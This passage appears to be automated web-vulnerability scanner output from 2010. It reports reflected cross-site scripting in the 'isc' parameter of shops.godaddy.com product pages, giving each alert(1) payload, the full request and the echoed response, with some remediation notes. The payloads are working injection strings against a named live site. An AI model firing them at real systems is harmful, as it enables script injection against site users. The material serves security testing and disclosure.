HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 180898 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=mznsn145q0mxr0vyei2mbbbu; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:32 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:32 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C0215e038";alert(1)//b62314b1d25&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3 was submitted in the isc parameter. This input was echoed as 214f7"style="x:expression(alert(1))"bebbc1845c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C021214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 182987 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=r5khpde40hdl1y55kfe0vo55; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:19 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:19 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94034"style%3d"x%3aexpression(alert(1))"3c8f6d48244 was submitted in the isc parameter. This input was echoed as 94034"style="x:expression(alert(1))"3c8f6d48244 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C02194034"style%3d"x%3aexpression(alert(1))"3c8f6d48244&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 173188 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=2zrwhnzamnwxhzezt4jdh3v5; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:02 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:02 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6439"%3balert(1)//fdb982fc19a was submitted in the isc parameter. This input was echoed as c6439";alert(1)//fdb982fc19a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C021c6439"%3balert(1)//fdb982fc19a&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 170552 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=djnvm2vqgewrps45qyay4j45; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:11 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:11 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8266"style%3d"x%3aexpression(alert(1))"29256dd5172 was submitted in the isc parameter. This input was echoed as e8266"style="x:expression(alert(1))"29256dd5172 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e8266"style%3d"x%3aexpression(alert(1))"29256dd5172&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 174449 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=i1pwcp55ajzxrbn5oho1so45; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:40 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:40 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5995"%3balert(1)//7fede595aaa was submitted in the isc parameter. This input was echoed as e5995";alert(1)//7fede595aaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e5995"%3balert(1)//7fede595aaa&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 172360 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=a0k3unrokggtlhrq10nlirez; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:52 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:52 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021e5995";alert(1)//7fede595aaa&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c77"%3balert(1)//4ff28e1f667 was submitted in the isc parameter. This input was echoed as b3c77";alert(1)//4ff28e1f667 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092b3c77"%3balert(1)//4ff28e1f667&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 171242 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=bg31by45uyjgfz3fgyire0q0; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:19:00 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:19:01 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:19:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256 was submitted in the isc parameter. This input was echoed as 563bb"style="x:expression(alert(1))"c4bb47fd256 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 173331 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=mq0cnx45momxjiqzprsxvxbu; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:18:48 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:18:48 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c was submitted in the isc parameter. This input was echoed as 1ad87"style="x:expression(alert(1))"ef69d8537c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C0211ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 169969 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=ge3fcjaiic3reiiglzahmw45; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:15 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:15 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0893"%3balert(1)//bec5869f8e5 was submitted in the isc parameter. This input was echoed as a0893";alert(1)//bec5869f8e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C021a0893"%3balert(1)//bec5869f8e5&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 167989 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=h0f2ar45fmu15k45r2cwyx2i; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:31 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:31 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021a0893";alert(1)//bec5869f8e5&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548c7"style%3d"x%3aexpression(alert(1))"1201d3f6253 was submitted in the isc parameter. This input was echoed as 548c7"style="x:expression(alert(1))"1201d3f6253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/?isc=GPPT03A092548c7"style%3d"x%3aexpression(alert(1))"1201d3f6253&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 178909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=a01qyinohmtk422uxnodvr2a; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Fri, 19-Nov-2010 23:18:28 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Tue, 14-Dec-2010 23:18:28 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74a28"%3balert(1)//b3dc8509c5b was submitted in the isc parameter. This input was echoed as 74a28";alert(1)//b3dc8509c5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/?isc=GPPT03A09274a28"%3balert(1)//b3dc8509c5b&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 176820 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=zqo1j2y3mbtrc4550d0iltyc; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Fri, 19-Nov-2010 23:18:39 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Tue, 14-Dec-2010 23:18:39 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbcf3"%3balert(1)//480388855c7 was submitted in the isc parameter. This input was echoed as cbcf3";alert(1)//480388855c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/?isc=GPPT03A092cbcf3"%3balert(1)//480388855c7&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 164820 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=w5e2t3bzroyx3rawg4pxmfyb; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Fri, 19-Nov-2010 23:18:25 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Tue, 14-Dec-2010 23:18:25 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4a8"style%3d"x%3aexpression(alert(1))"980abd3216d was submitted in the isc parameter. This input was echoed as 6f4a8"style="x:expression(alert(1))"980abd3216d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/?isc=GPPT03A0926f4a8"style%3d"x%3aexpression(alert(1))"980abd3216d&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 166909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=spld4vjrvvqlpk45xkgyv225; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Fri, 19-Nov-2010 23:18:09 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Tue, 14-Dec-2010 23:18:09 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:09 GMT Connection: close
